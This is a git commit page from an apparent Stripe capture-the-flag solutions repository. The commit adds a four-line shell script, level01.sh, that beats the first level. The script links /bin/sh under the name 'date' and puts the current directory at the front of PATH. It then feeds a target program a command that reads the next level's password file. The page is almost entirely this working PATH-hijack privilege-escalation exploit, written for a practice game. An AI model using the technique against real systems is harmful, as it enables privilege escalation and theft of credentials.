diff options
author | 2012-02-26 01:43:01 +0100 | |
---|---|---|
committer | 2012-02-26 01:47:20 +0100 | |
commit | 5d3c4121034acf6987cc7ad9427d6e9c828db326 (patch) | |
tree | 94330bee34805b29b7ce0ca08fab03829906cb23 /level01.sh | |
download | Stripe-CTF-5d3c4121034acf6987cc7ad9427d6e9c828db326.tar.xz Stripe-CTF-5d3c4121034acf6987cc7ad9427d6e9c828db326.zip |
Initial commit.
Diffstat (limited to 'level01.sh')
-rw-r--r-- | level01.sh | 4 |
1 files changed, 4 insertions, 0 deletions
diff --git a/level01.sh b/level01.sh new file mode 100644 index 0000000..1fa58a5 --- /dev/null +++ b/level01.sh @@ -0,0 +1,4 @@ +#!/bin/sh +ln -s /bin/sh ./date +echo "cat /home/level02/.password" | PATH=.:$PATH /levels/level01 | cut -d ' ' -f 3 +rm ./date |